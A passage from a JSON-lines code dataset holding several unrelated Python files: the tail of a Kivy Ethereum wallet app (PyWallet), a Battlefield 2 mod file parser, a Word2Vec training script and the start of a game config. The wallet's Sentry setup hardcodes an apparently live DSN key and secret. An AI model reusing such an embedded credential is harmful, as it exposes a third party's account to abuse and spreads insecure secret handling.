App.get_running_app().controller\n self.toggle_advanced(False)\n\n def verify_password_field(self):\n \"\"\"\n Makes sure passwords are matching and are not void.\n \"\"\"\n passwords_matching = self.new_password1 == self.new_password2\n passwords_not_void = self.new_password1 != ''\n return passwords_matching and passwords_not_void\n\n def verify_fields(self):\n \"\"\"\n Verifies password fields are valid.\n \"\"\"\n return self.verify_password_field()\n\n @property\n def security_slider_value(self):\n return self.security_slider.value\n\n @staticmethod\n def try_unlock(account, password):\n \"\"\"\n Just as a security measure, verifies we can unlock\n the newly created account with provided password.\n \"\"\"\n # making sure it's locked first\n account.lock()\n try:\n account.unlock(password)\n except ValueError:\n title = \"Unlock error\"\n body = \"\"\n body += \"Couldn't unlock your account.\\n\"\n body += \"The issue should be reported.\"\n dialog = Controller.create_dialog(title, body)\n dialog.open()\n return\n\n @mainthread\n def on_account_created(self, account):\n \"\"\"\n Switches to the newly created account.\n Clears the form.\n \"\"\"\n self.controller.current_account = account\n self.new_password1 = ''\n self.new_password2 = ''\n\n @mainthread\n def toggle_widgets(self, enabled):\n \"\"\"\n Enables/disables account creation widgets.\n \"\"\"\n self.disabled = not enabled\n\n def show_redirect_dialog(self):\n title = \"Account created, redirecting...\"\n body = \"\"\n body += \"Your account was created, \"\n body += \"you will be redirected to the overview.\"\n dialog = Controller.create_dialog(title, body)\n dialog.open()\n\n @run_in_thread\n def create_account(self):\n \"\"\"\n Creates an account from provided form.\n Verify we can unlock it.\n Disables widgets during the process, so the user doesn't try\n to create another account during the process.\n \"\"\"\n self.toggle_widgets(False)\n if not self.verify_fields():\n Controller.show_invalid_form_dialog()\n self.toggle_widgets(True)\n return\n pywalib = self.controller.pywalib\n password = self.new_password1\n security_ratio = self.security_slider_value\n # dividing again by 10, because otherwise it's\n # too slow on smart devices\n security_ratio /= 10.0\n Controller.snackbar_message(\"Creating account...\")\n account = pywalib.new_account(\n password=password, security_ratio=security_ratio)\n Controller.snackbar_message(\"Created!\")\n self.toggle_widgets(True)\n Controller.set_account_alias(account, self.alias)\n self.on_account_created(account)\n CreateNewAccount.try_unlock(account, password)\n self.show_redirect_dialog()\n self.controller.load_landing_page()\n return account\n\n def toggle_advanced(self, show):\n \"\"\"\n Shows/hides advanced account creation widgets.\n https://stackoverflow.com/q/23211142/185510\n \"\"\"\n advanced = self.ids.advanced_id\n alpha = 1 if show else 0\n for widget in advanced.children:\n widget.canvas.opacity = alpha\n widget.disabled = not show\n\n\nclass AddressButton(MDFlatButton):\n \"\"\"\n Overrides MDFlatButton, makes the font slightly smaller on mobile\n by using \"Body1\" rather than \"Button\" style.\n Also shorten content size using ellipsis.\n \"\"\"\n\n address_property = StringProperty()\n\n def __init__(self, **kwargs):\n super(AddressButton, self).__init__(**kwargs)\n Clock.schedule_once(lambda dt: self.setup())\n\n def setup(self):\n self.controller = App.get_running_app().controller\n self.set_font_and_shorten()\n\n def set_font_and_shorten(self):\n \"\"\"\n Makes the font slightly smaller on mobile\n by using \"Body1\" rather than \"Button\" style.\n Also shorten content size using ellipsis.\n \"\"\"\n content = self.ids.content\n content.font_style = 'Body1'\n content.shorten = True\n\n def on_parent_size(instance, size):\n # see BaseRectangularButton.width definition\n button_margin = dp(32)\n parent_width = instance.width\n # TODO: the new size should be a min() of\n # parent_width and actual content size\n content.width = parent_width - button_margin\n self.parent.bind(size=on_parent_size)\n # call it once manually, refs:\n # https://github.com/AndreMiras/PyWallet/issues/74\n on_parent_size(self.parent, None)\n\n def on_address_property(self, instance, address):\n \"\"\"\n Sets the address alias if it exists or defaults to the address itself.\n \"\"\"\n try:\n text = Controller.get_address_alias(address)\n except KeyError:\n text = address\n self.text = text\n\n\nclass PWToolbar(Toolbar):\n\n title_property = StringProperty()\n\n def __init__(self, **kwargs):\n super(PWToolbar, self).__init__(**kwargs)\n Clock.schedule_once(lambda dt: self.setup())\n\n def setup(self):\n self.controller = App.get_running_app().controller\n self.navigation = self.controller.ids.navigation_id\n self.load_default_navigation()\n\n def load_default_navigation(self):\n self.left_action_items = [\n ['menu', lambda x: self.toggle_nav_drawer()]\n ]\n self.right_action_items = [\n ['dots-vertical', lambda x: self.toggle_nav_drawer()]\n ]\n\n def toggle_nav_drawer(self):\n self.navigation.toggle_nav_drawer()\n\n\nclass StringIOCBWrite(StringIO):\n \"\"\"\n Inherits StringIO, provides callback on write.\n \"\"\"\n\n def __init__(self, initial_value='', newline='\\n', callback_write=None):\n \"\"\"\n Overloads the StringIO.__init__() makes it possible to hook a callback\n for write operations.\n \"\"\"\n self.callback_write = callback_write\n super(StringIOCBWrite, self).__init__(initial_value, newline)\n\n def write(self, s):\n \"\"\"\n Calls the StringIO.write() method then the callback_write with\n given string parameter.\n \"\"\"\n # io.StringIO expects unicode\n s_unicode = s.decode('utf-8')\n super(StringIOCBWrite, self).write(s_unicode)\n if self.callback_write is not None:\n self.callback_write(s_unicode)\n\n\nclass ScrollableLabel(ScrollView):\n \"\"\"\n https://github.com/kivy/kivy/wiki/Scrollable-Label\n \"\"\"\n text = StringProperty('')\n\n\nclass AboutChangelog(BoxLayout):\n changelog_text_property = StringProperty()\n\n def __init__(self, **kwargs):\n super(AboutChangelog, self).__init__(**kwargs)\n Clock.schedule_once(lambda dt: self.load_changelog())\n\n def load_changelog(self):\n changelog_path = os.path.join(\n Controller.src_dir(),\n 'CHANGELOG.md')\n with open(changelog_path, 'r') as f:\n self.changelog_text_property = f.read()\n f.close()\n\n\nclass AboutOverview(BoxLayout):\n project_page_property = StringProperty(\n \"https://github.com/AndreMiras/PyWallet\")\n about_text_property = StringProperty()\n\n def __init__(self, **kwargs):\n super(AboutOverview, self).__init__(**kwargs)\n Clock.schedule_once(lambda dt: self.load_about())\n\n def load_about(self):\n self.about_text_property = \"\" + \\\n \"PyWallet version: %s\\n\" % (__version__) + \\\n \"Project source code and info available on GitHub at: \\n\" + \\\n \"[color=00BFFF][ref=github]\" + \\\n self.project_page_property + \\\n \"[/ref][/color]\"\n\n\nclass AboutDiagnostic(BoxLayout):\n stream_property = StringProperty()\n\n @mainthread\n def callback_write(self, s):\n \"\"\"\n Updates the UI with test progress.\n \"\"\"\n self.stream_property += s\n\n @run_in_thread\n def run_tests(self):\n \"\"\"\n Loads the test suite and hook the callback for reporting progress.\n \"\"\"\n Controller.patch_keystore_path()\n test_suite = suite()\n self.stream_property = \"\"\n stream = StringIOCBWrite(callback_write=self.callback_write)\n verbosity = 2\n unittest.TextTestRunner(\n stream=stream, verbosity=verbosity).run(test_suite)\n\n\nclass OverviewScreen(Screen):\n\n title_property = StringProperty()\n\n def set_title(self, title):\n self.title_property = title\n\n\nclass SwitchAccountScreen(Screen):\n pass\n\n\nclass ManageKeystoreScreen(Screen):\n pass\n\n\nclass AboutScreen(Screen):\n pass\n\n\nclass FlashQrCodeScreen(Screen):\n\n def __init__(self, **kwargs):\n super(FlashQrCodeScreen, self).__init__(**kwargs)\n self.setup()\n\n def setup(self):\n \"\"\"\n Configures scanner to handle only QRCodes.\n \"\"\"\n self.controller = App.get_running_app().controller\n self.zbarcam = self.ids.zbarcam_id\n # loads ZBarCam only when needed, refs:\n # https://github.com/AndreMiras/PyWallet/issues/94\n import zbar\n # enables QRCode scanning only\n self.zbarcam.scanner.set_config(\n zbar.Symbol.NONE, zbar.Config.ENABLE, 0)\n self.zbarcam.scanner.set_config(\n zbar.Symbol.QRCODE, zbar.Config.ENABLE, 1)\n\n def bind_on_symbols(self):\n \"\"\"\n Since the camera doesn't seem to stop properly, we always bind/unbind\n on_pre_enter/on_pre_leave.\n \"\"\"\n self.zbarcam.bind(symbols=self.on_symbols)\n\n def unbind_on_symbols(self):\n \"\"\"\n Since the camera doesn't seem to stop properly, makes sure at least\n events are unbound.\n \"\"\"\n self.zbarcam.unbind(symbols=self.on_symbols)\n\n def on_symbols(self, instance, symbols):\n # also ignores if more than 1 code were found since we don't want to\n # send to the wrong one\n if len(symbols) != 1:\n return\n symbol = symbols[0]\n # update Send screen address\n self.controller.send.send_to_address = symbol.data\n self.zbarcam.play = False\n self.controller.load_landing_page()\n\n\nclass Controller(FloatLayout):\n\n # allownone, e.g. when the keystore is void\n current_account = ObjectProperty(allownone=True)\n # pseudo Etherscan cache, keeps a local copy of accounts balance & history\n # accounts_balance[account_0xaddress]\n accounts_balance = DictProperty({})\n # accounts_history[account_0xaddress]\n accounts_history = DictProperty({})\n # keeps track of all dialogs alive\n dialogs = []\n __lock = threading.Lock()\n\n def __init__(self, **kwargs):\n super(Controller, self).__init__(**kwargs)\n keystore_path = Controller.get_keystore_path()\n self.pywalib = PyWalib(keystore_path)\n self.screen_history = []\n self.register_event_type('on_alias_updated')\n Clock.schedule_once(lambda dt: self.load_landing_page())\n Window.bind(on_keyboard=self.on_keyboard)\n\n def on_keyboard(self, window, key, *args):\n \"\"\"\n Handles the back button (Android) and ESC key.\n Goes back to the previous screen or quite the application\n if there's none left.\n \"\"\"\n if key == 27:\n screen_manager = self.screen_manager\n # if we already are in the overview screen, also move back to\n # the overview subtab of the overview screen\n if screen_manager.current == 'overview':\n overview_bnavigation = self.overview_bnavigation\n tab_manager = overview_bnavigation.ids['tab_manager']\n if tab_manager.current != 'overview':\n self.select_overview_subtab()\n return True\n else:\n # if we were already in the overview:overview subtab,\n # then propagates the key which in this case will exit\n # the application\n return False\n self.screen_manager_previous()\n # stops the propagation\n return True\n return False\n\n @property\n def overview_bnavigation(self):\n screen_manager = self.screen_manager\n overview_screen = screen_manager.get_screen('overview')\n overview_bnavigation = overview_screen.ids.overview_bnavigation_id\n return overview_bnavigation\n\n @property\n def overview(self):\n overview_bnavigation = self.overview_bnavigation\n return overview_bnavigation.ids.overview_id\n\n @property\n def history(self):\n return self.overview.ids.history_id\n\n @property\n def switch_account(self):\n screen_manager = self.screen_manager\n switch_account_screen = screen_manager.get_screen('switch_account')\n switch_account_id = switch_account_screen.ids.switch_account_id\n return switch_account_id\n\n @property\n def send(self):\n overview_bnavigation = self.overview_bnavigation\n return overview_bnavigation.ids.send_id\n\n @property\n def manage_keystores(self):\n screen_manager = self.screen_manager\n manage_keystores_screen = screen_manager.get_screen('manage_keystores')\n manage_keystores_bnavigation_id = \\\n manage_keystores_screen.ids.manage_keystores_id\n return manage_keystores_bnavigation_id\n\n @property\n def manage_existing(self):\n manage_keystores = self.manage_keystores\n return manage_keystores.ids.manage_existing_id\n\n @property\n def create_new_account(self):\n manage_keystores = self.manage_keystores\n return manage_keystores.ids.create_new_account_id\n\n @property\n def toolbar(self):\n return self.ids.toolbar_id\n\n @property\n def screen_manager(self):\n return self.ids.screen_manager_id\n\n def set_toolbar_title(self, title):\n self.toolbar.title_property = title\n\n def bind_current_account_balance(self):\n \"\"\"\n Binds the accounts_balance to the Toolbar title.\n \"\"\"\n self.bind(accounts_balance=self.update_toolbar_title_balance)\n\n def unbind_current_account_balance(self):\n \"\"\"\n Unbinds the accounts_balance from the Toolbar title.\n \"\"\"\n self.unbind(accounts_balance=self.update_toolbar_title_balance)\n\n def screen_manager_current(self, current, direction=None, history=True):\n screens = {\n 'overview': OverviewScreen,\n 'switch_account': SwitchAccountScreen,\n 'manage_keystores': ManageKeystoreScreen,\n 'flashqrcode': FlashQrCodeScreen,\n 'about': AboutScreen,\n }\n screen_manager = self.screen_manager\n # creates the Screen object if it doesn't exist\n if not screen_manager.has_screen(current):\n screen = screens[current](name=current)\n screen_manager.add_widget(screen)\n if direction is not None:\n screen_manager.transition.direction = direction\n screen_manager.current = current\n if history:\n # do not update history if it's the same screen because we do not\n # want the go back button to behave like it was doing nothing\n if not self.screen_history or self.screen_history[-1] != current:\n self.screen_history.append(current)\n # in this case let's reset since the overview is the root screen\n # because we never want the back button to bring us from overview\n # to another screen\n if current == 'overview':\n self.screen_history = []\n\n def screen_manager_previous(self):\n try:\n previous_screen = self.screen_history.pop(-2)\n except IndexError:\n previous_screen = 'overview'\n self.screen_manager_current(\n previous_screen, direction='right', history=False)\n\n @classmethod\n def show_invalid_form_dialog(cls):\n title = \"Invalid form\"\n body = \"Please check form fields.\"\n dialog = cls.create_dialog(title, body)\n dialog.open()\n\n @staticmethod\n def patch_keystore_path():\n \"\"\"\n Changes pywalib default keystore path depending on platform.\n Currently only updates it on Android.\n \"\"\"\n if platform != \"android\":\n return\n import pywalib\n # uses kivy user_data_dir (/sdcard/)\n pywalib.KEYSTORE_DIR_PREFIX = App.get_running_app().user_data_dir\n\n @classmethod\n def get_keystore_path(cls):\n \"\"\"\n This is the Kivy default keystore path.\n \"\"\"\n keystore_path = os.environ.get('KEYSTORE_PATH')\n if keystore_path is None:\n Controller.patch_keystore_path()\n keystore_path = PyWalib.get_default_keystore_path()\n return keystore_path\n\n @staticmethod\n def get_store_path():\n \"\"\"\n Returns the full user store path.\n \"\"\"\n user_data_dir = App.get_running_app().user_data_dir\n store_path = os.path.join(user_data_dir, 'store.json')\n return store_path\n\n @classmethod\n def get_store(cls):\n \"\"\"\n Returns the full user Store object instance.\n \"\"\"\n store_path = cls.get_store_path()\n store = JsonStore(store_path)\n return store\n\n @classmethod\n def delete_account_alias(cls, account):\n \"\"\"\n Deletes the alias for the given account.\n \"\"\"\n address = \"0x\" + account.address.encode(\"hex\")\n store = cls.get_store()\n alias_dict = store['alias']\n alias_dict.pop(address)\n store['alias'] = alias_dict\n\n @classmethod\n def set_account_alias(cls, account, alias):\n \"\"\"\n Sets an alias for a given Account object.\n Deletes the alias if empty.\n \"\"\"\n # if the alias is empty and an alias exists for this address,\n # deletes it\n if alias == '':\n try:\n cls.delete_account_alias(account)\n except KeyError:\n pass\n return\n address = \"0x\" + account.address.encode(\"hex\")\n store = cls.get_store()\n try:\n alias_dict = store['alias']\n except KeyError:\n # creates store if doesn't yet exists\n store.put('alias')\n alias_dict = store['alias']\n alias_dict.update({address: alias})\n store['alias'] = alias_dict\n\n @classmethod\n def get_address_alias(cls, address):\n \"\"\"\n Returns the alias of the given address string.\n \"\"\"\n store = cls.get_store()\n return store.get('alias')[address]\n\n @classmethod\n def get_account_alias(cls, account):\n \"\"\"\n Returns the alias of the given Account object.\n \"\"\"\n address = \"0x\" + account.address.encode(\"hex\")\n return cls.get_address_alias(address)\n\n @staticmethod\n def src_dir():\n return os.path.dirname(os.path.abspath(__file__))\n\n @classmethod\n def on_dialog_dismiss(cls, dialog):\n \"\"\"\n Removes it from the dialogs track list.\n \"\"\"\n with cls.__lock:\n try:\n cls.dialogs.remove(dialog)\n except ValueError:\n # fails silently if the dialog was dismissed twice, refs:\n # https://github.com/AndreMiras/PyWallet/issues/89\n pass\n\n @classmethod\n def dismiss_all_dialogs(cls):\n \"\"\"\n Dispatches dismiss event for all dialogs.\n \"\"\"\n # keeps a local copy since we're altering them as we iterate\n dialogs = cls.dialogs[:]\n for dialog in dialogs:\n dialog.dispatch('on_dismiss')\n\n @classmethod\n def create_dialog_helper(cls, title, body):\n \"\"\"\n Creates a dialog from given title and body.\n Adds it to the dialogs track list.\n \"\"\"\n content = MDLabel(\n font_style='Body1',\n theme_text_color='Secondary',\n text=body,\n size_hint_y=None,\n valign='top')\n content.bind(texture_size=content.setter('size'))\n dialog = MDDialog(\n title=title,\n content=content,\n size_hint=(.8, None),\n height=dp(250),\n auto_dismiss=False)\n dialog.bind(on_dismiss=cls.on_dialog_dismiss)\n with cls.__lock:\n cls.dialogs.append(dialog)\n return dialog\n\n @classmethod\n def create_dialog(cls, title, body):\n \"\"\"\n Creates a dialog from given title and body.\n Adds it to the dialogs track list.\n Appends dismiss action.\n \"\"\"\n dialog = cls.create_dialog_helper(title, body)\n dialog.add_action_button(\n \"Dismiss\",\n action=lambda *x: dialog.dismiss())\n return dialog\n\n @classmethod\n def on_balance_connection_error(cls):\n title = \"Network error\"\n body = \"Couldn't load balance, no network access.\"\n dialog = cls.create_dialog(title, body)\n dialog.open()\n\n @classmethod\n def on_balance_value_error(cls):\n title = \"Decode error\"\n body = \"Couldn't not decode balance data.\"\n dialog = cls.create_dialog(title, body)\n dialog.open()\n\n @classmethod\n def on_balance_unknown_error(cls):\n title = \"Unknown error\"\n body = \"Unknown error while fetching balance.\"\n dialog = cls.create_dialog(title, body)\n dialog.open()\n\n @classmethod\n def on_history_connection_error(cls):\n title = \"Network error\"\n body = \"Couldn't load history, no network access.\"\n dialog = cls.create_dialog(title, body)\n dialog.open()\n\n @classmethod\n def on_history_value_error(cls):\n title = \"Decode error\"\n body = \"Couldn't not decode history data.\"\n dialog = cls.create_dialog(title, body)\n dialog.open()\n\n @mainthread\n def update_toolbar_title_balance(self, instance=None, value=None):\n if self.current_account is None:\n return\n address = '0x' + self.current_account.address.encode(\"hex\")\n try:\n balance = self.accounts_balance[address]\n except KeyError:\n balance = 0\n title = \"%s ETH\" % (balance)\n self.set_toolbar_title(title)\n\n @staticmethod\n @mainthread\n def snackbar_message(text):\n Snackbar(text=text).show()\n\n def load_landing_page(self):\n \"\"\"\n Loads the landing page.\n \"\"\"\n try:\n # will trigger account data fetching\n self.current_account = self.pywalib.get_main_account()\n if SCREEN_SWITCH_DELAY:\n Clock.schedule_once(\n lambda dt: self.screen_manager_current('overview'),\n SCREEN_SWITCH_DELAY)\n else:\n self.screen_manager_current('overview')\n except IndexError:\n self.load_create_new_account()\n\n @run_in_thread\n def fetch_balance(self):\n \"\"\"\n Fetches the new balance & sets accounts_balance property.\n \"\"\"\n if self.current_account is None:\n return\n address = '0x' + self.current_account.address.encode(\"hex\")\n try:\n balance = PyWalib.get_balance(address)\n except ConnectionError:\n Controller.on_balance_connection_error()\n Logger.warning('ConnectionError', exc_info=True)\n return\n except ValueError:\n # most likely the JSON object could not be decoded, refs #91\n # currently logged as an error, because we want more insight\n # in order to eventually handle it more specifically\n Controller.on_balance_value_error()\n Logger.error('ValueError', exc_info=True)\n return\n except UnknownEtherscanException:\n # also handles uknown errors, refs #112\n Controller.on_balance_unknown_error()\n Logger.error('UnknownEtherscanException', exc_info=True)\n return\n # triggers accounts_balance observers update\n self.accounts_balance[address] = balance\n\n def on_update_alias_clicked(self, dialog, alias):\n account = self.current_account\n Controller.set_account_alias(account, alias)\n # makes sure widgets that already rendered the address get updated\n self.dispatch('on_alias_updated', alias)\n dialog.dismiss()\n\n def on_alias_updated(self, *args):\n pass\n\n def prompt_alias_dialog(self):\n \"\"\"\n Prompts the update alias dialog.\n \"\"\"\n account = self.current_account\n title = \"Update your alias\"\n content = AliasForm(account)\n dialog = MDDialog(\n title=title,\n content=content,\n size_hint=(.8, None),\n height=dp(250),\n auto_dismiss=False)\n # workaround for MDDialog container size (too small by default)\n dialog.ids.container.size_hint_y = 1\n dialog.add_action_button(\n \"Update\",\n action=lambda *x: self.on_update_alias_clicked(\n dialog, content.alias))\n dialog.open()\n\n def copy_address_clipboard(self):\n \"\"\"\n Copies the current account address to the clipboard.\n \"\"\"\n account = self.current_account\n address = \"0x\" + account.address.encode(\"hex\")\n Clipboard.copy(address)\n\n def open_address_options(self):\n \"\"\"\n Loads the address options bottom sheet.\n \"\"\"\n bottom_sheet = MDListBottomSheet()\n bottom_sheet.add_item(\n 'Switch account',\n lambda x: self.load_switch_account(), icon='swap-horizontal')\n bottom_sheet.add_item(\n 'Change alias',\n lambda x: self.prompt_alias_dialog(), icon='information')\n bottom_sheet.add_item(\n 'Copy address',\n lambda x: self.copy_address_clipboard(), icon='content-copy')\n bottom_sheet.open()\n\n def select_overview_subtab(self):\n \"\"\"\n Selects the overview sub tab.\n \"\"\"\n # this is what we would normally do:\n # tab_manager.current = 'overview'\n # but instead we need to simulate the click on the\n # navigation bar children or the associated screen button\n # would not have the selected color\n overview_bnavigation = self.overview_bnavigation\n navigation_bar = overview_bnavigation.children[0]\n boxlayout = navigation_bar.children[0]\n nav_headers = boxlayout.children\n # the overview is the first/last button\n overview_nav_header = nav_headers[-1]\n overview_nav_header.dispatch('on_press')\n\n def load_switch_account(self):\n \"\"\"\n Loads the switch account screen.\n \"\"\"\n # loads the switch account screen\n Clock.schedule_once(\n lambda dt: self.screen_manager_current(\n 'switch_account', direction='left'),\n SCREEN_SWITCH_DELAY)\n\n def load_manage_keystores(self):\n \"\"\"\n Loads the manage keystores screen.\n \"\"\"\n # loads the manage keystores screen\n if SCREEN_SWITCH_DELAY:\n Clock.schedule_once(\n lambda dt: self.screen_manager_current(\n 'manage_keystores', direction='left'),\n SCREEN_SWITCH_DELAY)\n else:\n self.screen_manager_current(\n 'manage_keystores', direction='left')\n\n def load_create_new_account(self):\n \"\"\"\n Loads the create new account tab from the manage keystores screen.\n \"\"\"\n # we need the screen now\n global SCREEN_SWITCH_DELAY\n saved_delay = SCREEN_SWITCH_DELAY\n SCREEN_SWITCH_DELAY = None\n self.load_manage_keystores()\n SCREEN_SWITCH_DELAY = saved_delay\n # loads the create new account tab\n manage_keystores = self.manage_keystores\n create_new_account_nav_item = \\\n manage_keystores.ids.create_new_account_nav_item_id\n create_new_account_nav_item.dispatch('on_tab_press')\n\n def load_flash_qr_code(self):\n \"\"\"\n Loads the flash QR Code screen.\n \"\"\"\n # loads ZBarCam only when needed, refs:\n # https://github.com/AndreMiras/PyWallet/issues/94\n from zbarcam import ZBarCam # noqa\n # loads the flash QR Code screen\n self.screen_manager_current('flashqrcode', direction='left')\n\n def load_about_screen(self):\n \"\"\"\n Loads the about screen.\n \"\"\"\n Clock.schedule_once(\n lambda dt: self.screen_manager_current('about', direction='left'),\n SCREEN_SWITCH_DELAY)\n\n\nclass DebugRavenClient(object):\n \"\"\"\n The DebugRavenClient should be used in debug mode, it just raises\n the exception rather than capturing it.\n \"\"\"\n\n def captureException(self):\n raise\n\n\nclass PyWalletApp(App):\n theme_cls = ThemeManager()\n\n def build(self):\n self.icon = \"docs/images/icon.png\"\n return Controller(info='PyWallet')\n\n @property\n def controller(self):\n return self.root\n\n\ndef configure_sentry(in_debug=False):\n \"\"\"\n Configure the Raven client, or create a dummy one if `in_debug` is `True`.\n \"\"\"\n key = 'eaee971c463b49678f6f352dfec497a9'\n # the public DSN URL is not available on the Python client\n # so we're exposing the secret and will be revoking it on abuse\n # https://github.com/getsentry/raven-python/issues/569\n secret = '4f37fdbde03a4753b78abb84d11f45ab'\n project_id = '191660'\n dsn = 'https://{key}:{secret}@sentry.io/{project_id}'.format(\n key=key, secret=secret, project_id=project_id)\n if in_debug:\n client = DebugRavenClient()\n else:\n client = Client(dsn=dsn, release=__version__)\n # adds context for Android devices\n if platform == 'android':\n from jnius import autoclass\n Build = autoclass(\"android.os.Build\")\n VERSION = autoclass('android.os.Build$VERSION')\n android_os_build = {\n 'model': Build.MODEL,\n 'brand': Build.BRAND,\n 'device': Build.DEVICE,\n 'manufacturer': Build.MANUFACTURER,\n 'version_release': VERSION.RELEASE,\n }\n client.user_context({'android_os_build': android_os_build})\n # Logger.error() to Sentry\n # https://docs.sentry.io/clients/python/integrations/logging/\n handler = SentryHandler(client)\n handler.setLevel(LOG_LEVELS.get('error'))\n setup_logging(handler)\n return client\n\n\nif __name__ == '__main__':\n # when the -d/--debug flag is set, Kivy sets log level to debug\n level = Logger.getEffectiveLevel()\n in_debug = level == LOG_LEVELS.get('debug')\n client = configure_sentry(in_debug)\n try:\n PyWalletApp().run()\n except:\n if type(client) == Client:\n Logger.info(\n 'Errors will be sent to Sentry, run with \"--debug\" if you '\n 'are a developper and want to the error in the shell.')\n client.captureException()\n","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":55359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"55707901","text":"import os\nimport re\nimport sys\n\n\nclass Mod(object):\n\n def __init__(self):\n self.root = self.find_mod_root()\n\n def find_mod_root(self):\n workdir_parts = os.getcwd().split(os.sep)\n return os.sep.join(\n workdir_parts[:workdir_parts.index('mods') + 2])\n\n def get_object_path(self, name):\n for dirname, dirnames, filenames in os.walk(\n os.path.join(self.root, 'objects')):\n for filename in filenames:\n if filename.split('.')[-1] in ['con', 'tweak']:\n filepath = os.path.join(\n self.root, 'objects', dirname, filename)\n root = TemplateParser(filepath).get_root()\n if root is not None and root[1] == name:\n return filepath\n\n\n\n# ############################################### #\n# !!!untested shit leftover from materials parser #\nclass TemplateParser:\n # regex from mats\n # ObjectTeamplate.(create|activeSafe) \n\n def __init__(self, filepath):\n self.path_object_folder = self.get_root_folder(filepath)\n self.path_object_template = filepath\n self.object_types_list = [\n 'PlayerControlObject',\n 'Wing',\n 'Wheel',\n 'Spring',\n 'RotationalBundle',\n 'Engine'\n 'SimpleObject'\n ]\n\n def get_root_folder(self, filepath):\n path, filename = os.path.split(filepath)\n return path\n\n def get_root(self):\n object_types_string = '|'.join(self.object_types_list)\n pattern1 = r'ObjectTemplate.create (' + object_types_string + ') (\\w)+'\n with open(self.path_object_template) as confile:\n for line in confile:\n match = re.search(pattern1, line)\n if match:\n # first match is our object\n type = match.group().split(' ')[1]\n name = match.group().split(' ')[2]\n return (type, name)\n\n def get_child_list(self):\n child_list = []\n object_types_string = '|'.join(self.object_types_list)\n pattern1 = r'ObjectTemplate.create (' + object_types_string + ') (\\w)+'\n pattern2 = r'include (\\w)+.tweak'\n with open(self.path_object_template) as confile:\n for line in confile:\n match = re.search(pattern1, line)\n if match:\n child_list.append(match.group())\n match = re.search(pattern2, line)\n if match:\n with open(os.path.join(self.path_object_folder, match.group().split(' ')[1])) as tweakfile:\n for line in tweakfile:\n match = re.search(pattern1, line)\n if match:\n child_list.append(match.group())\n return child_list\n\n def get_wings(self):\n wings = []\n pattern1 = r'ObjectTemplate.(create|activeSafe) Wing (\\w)+'\n pattern2 = r'include (\\w)+.tweak'\n pattern3 = r'(ObjectTemplate.(create|activeSafe) Wing (\\w)+)|(ObjectTemplate.setWingLift ([-+]?\\d*\\.\\d+|\\d+))|(ObjectTemplate.setFlapLift ([-+]?\\d*\\.\\d+|\\d+))'\n with open(self.path_object_template) as confile:\n for line in confile:\n match = re.search(pattern2, line)\n if match:\n with open(os.path.join(self.path_object_folder, match.group().split(' ')[1])) as tweakfile:\n '''\n for id, line in enumerate(tweakfile.readlines()):\n match = re.search(pattern1, line)\n if match:\n wing_name = match.group().split(' ')[2]\n wing = Wing(wing_name)\n #wing.lift_wing =\n '''\n # whole file test\n for line in tweakfile.readlines():\n match = re.search(pattern3, line)\n if match:\n print(match.group())\n\n\nclass Materials:\n # MaterialManager.createCell 1 18\n # MaterialManager.damageMod 1\n\n class Material:\n\n def __init__(self, id):\n self.id = id\n self.name = None\n self.damage_mod = {}\n\n def __eq__(self, other):\n return self.id == other.id\n\n def __hash__(self):\n return hash('id', self.id)\n\n def __init__(self, filepath):\n self.cells = self.parse_settings(filepath)\n\n def parse_settings(self, filepath):\n cells = {}\n with open(filepath) as fo:\n matches = re.finditer(\n r'MaterialManager.createCell (\\d+) (\\d+)\\nMaterialManager.damageMod ((\\d+\\.\\d+)|(\\d+))',\n fo.read())\n for match in matches:\n #pattern_cell = r'MaterialManager.createCell (\\d+) (\\d+)'\n #match_cell = re.match(pattern_cell, match.group())\n mat_id_attacker, mat_id_target = int(\n match.group(1)), int(match.group(2))\n attacker = self.Material(mat_id_attacker)\n if attacker.id not in cells:\n cells[attacker.id] = attacker\n if mat_id_target not in cells[attacker.id].damage_mod:\n cells[attacker.id].damage_mod[\n mat_id_target] = float(match.group(3))\n return cells\n\n\nclass GameObject:\n\n def __init__(self, name):\n self.name = name\n self.type = None\n self.childs = []\n self.childs_created = []\n self.mapped_materials = {}\n\n def loadFromCon(self, path_confile):\n parser = TemplateParser(path_confile)\n self.type, self.name = parser.get_root()\n self.childs_created = parser.get_child_list()\n # print(self.childs_created)\n\n\nclass Jet:\n\n def __init__(self):\n self.name = None\n self.type = None\n self.wings = []\n\n def loadFromCon(self, path_confile):\n parser = TemplateParser(path_confile)\n self.type, self.name = parser.get_root()\n self.wings = parser.get_wings()\n\n\nclass Wing():\n\n def __init__(self, name):\n self.name = name\n self.lift_wing = 0\n self.lift_flap = 0\n","sub_path":"deprecated/bf2.py","file_name":"bf2.py","file_ext":"py","file_size_in_byte":6387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"429345474","text":"\"\"\"\nAPI at https://radimrehurek.com/gensim/models/word2vec.html\ntutorial at https://blog.cambridgespark.com/tutorial-build-your-own-embedding-and-use-it-in-a-neural-network-e9cde4a81296\n\n\n\"\"\"\nfrom gensim.models import Word2Vec\nimport spacy\nimport os\n\ntrain_set = []\n\n# get entire corpus\nrootdir = './Datasets'\ncorpus = []\nnlp = spacy.load(\"en_core_web_sm\", disable=[\"ner\"])\nfor subdir, dirs, files in os.walk(rootdir):\n for file in files:\n if file != '.DS_Store':\n with open(os.path.join(subdir, file), 'r') as f:\n lines = f.readlines()\n text = \"\".join(lines[5:])\n text = text.lower()\n text = text.replace(\")[\", \") \")\n text = text.replace(\"\\n\", \" \")\n text = text.replace(\".)\", \". \")\n doc = nlp(text)\n sentences = doc.sents\n for sentence in sentences:\n corpus.append([str(token) for token in list(sentence.__iter__())])\n\nw2v = Word2Vec(corpus, size=300, window=4, min_count=3, negative=15, iter=20)\n\nword_vectors = w2v.wv\nresult = word_vectors.similar_by_word(\"picard\")\nprint(result)\nw2v.save('trek_w2v.model')\n\n#odel = Word2Vec.load('trek_w2v_fics.model')\n#vectors = model.wv\n#print(vectors.similar_by_word(\"vulcan\"))\n\n\n","sub_path":"get_word2vec.py","file_name":"get_word2vec.py","file_ext":"py","file_size_in_byte":1295,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"367382512","text":"DEFAULT_SCREEN_SIZE = (800, 600)\nDEFAULT_PLAYER_SPEED = 10\nDEFAULT_BALL_SPEED = 40.0\nDEFAULT_MAX_BALL_SPEED = 